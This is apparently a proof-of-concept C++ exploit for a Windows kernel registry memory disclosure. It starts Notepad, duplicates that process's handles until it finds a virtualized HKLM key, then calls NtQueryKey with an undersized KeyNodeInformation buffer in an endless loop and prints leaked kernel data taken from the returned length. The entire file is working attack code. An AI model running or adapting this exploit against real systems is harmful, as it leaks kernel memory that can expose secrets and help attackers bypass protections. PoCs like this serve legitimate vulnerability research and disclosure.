#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ntstatus.h>

#include <cstdio>
#include <cstdlib>

#pragma comment(lib, "ntdll")

#define ObjectNameInformation ((OBJECT_INFORMATION_CLASS)1)
#define KeyNodeInformation 1

extern "C" {

LONG NTAPI RtlCompareUnicodeString(
  PCUNICODE_STRING String1,
  PCUNICODE_STRING String2,
  BOOLEAN CaseInSensitive
);

NTSTATUS NTAPI NtQueryKey(
  HANDLE KeyHandle,
  DWORD KeyInformationClass,
  PVOID KeyInformation,
  ULONG Length,
  PULONG ResultLength
);

}  // extern "C"

int main() {
  BYTE NameBuffer[0x200];
  NTSTATUS Status;

  //
  // Create the Notepad process and wait for it to fully start.
  //

  STARTUPINFOW si;
  PROCESS_INFORMATION pi;

  memset(&si, 0, sizeof(si));
  memset(&pi, 0, sizeof(pi));

  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESHOWWINDOW;
  si.wShowWindow = SW_MINIMIZE;

  BOOL bRet = CreateProcessW(L"C:\\Windows\\system32\\notepad.exe",
                             NULL,
                             NULL,
                             NULL,
                             FALSE,
                             0,
                             NULL,
                             NULL,
                             &si,
                             &pi);

  if (bRet) {
    CloseHandle(pi.hThread);
  } else {
    printf("CreateProcess failed with error %u\n", GetLastError());
    return 1;
  }

  Sleep(1000);

  //
  // Enumerate the subprocess handles in search of one that points to
  // a virtualized HKLM.
  //

  UNICODE_STRING TargetKeyPath;
  RtlInitUnicodeString(&TargetKeyPath, L"\\Registry\\Machine");

  HKEY hKeyMachine = NULL;
  for (ULONG Handle = 4; Handle < 0x1000; Handle += 4) {
    HANDLE DuplicatedHandle;
    bRet = DuplicateHandle(pi.hProcess,
                           (HANDLE)Handle,
                           GetCurrentProcess(),
                           &DuplicatedHandle,
                           0,
                           FALSE,
                           DUPLICATE_SAME_ACCESS);

    ULONG ReturnLength;
    Status = NtQueryObject(DuplicatedHandle,
                           ObjectNameInformation,
                           NameBuffer,
                           sizeof(NameBuffer),
                           &ReturnLength);

    if (NT_SUCCESS(Status)) {
      PUNICODE_STRING Name = (PUNICODE_STRING)NameBuffer;

      if (!RtlCompareUnicodeString(Name, &TargetKeyPath, TRUE)) {
        hKeyMachine = (HKEY)DuplicatedHandle;
        break;
      }
    }

    CloseHandle(DuplicatedHandle);
  }

  if (hKeyMachine == NULL) {
    printf("Failed to find HKLM\n");
    return 1;
  }

  //
  // Trigger the memory disclosure and print out the leaked data indefinitely.
  //

  ULONG LastLeakedBytes = 0;
  while (1) {
    BYTE KeyNodeBuffer[0x11] = { /* zero */ };
    ULONG ResultLength = 0;
    Status = NtQueryKey(hKeyMachine,
                        KeyNodeInformation,
                        KeyNodeBuffer,
                        sizeof(KeyNodeBuffer),
                        &ResultLength);

    ULONG LeakedBytes = (ResultLength - 0x28) >> 8;

    if (LeakedBytes > 0x100 && LeakedBytes != LastLeakedBytes) {
      printf("Leaked bytes: %x\n", LeakedBytes);
      LastLeakedBytes = LeakedBytes;
    }
  }

  RegCloseKey(hKeyMachine);

  return 0;
}
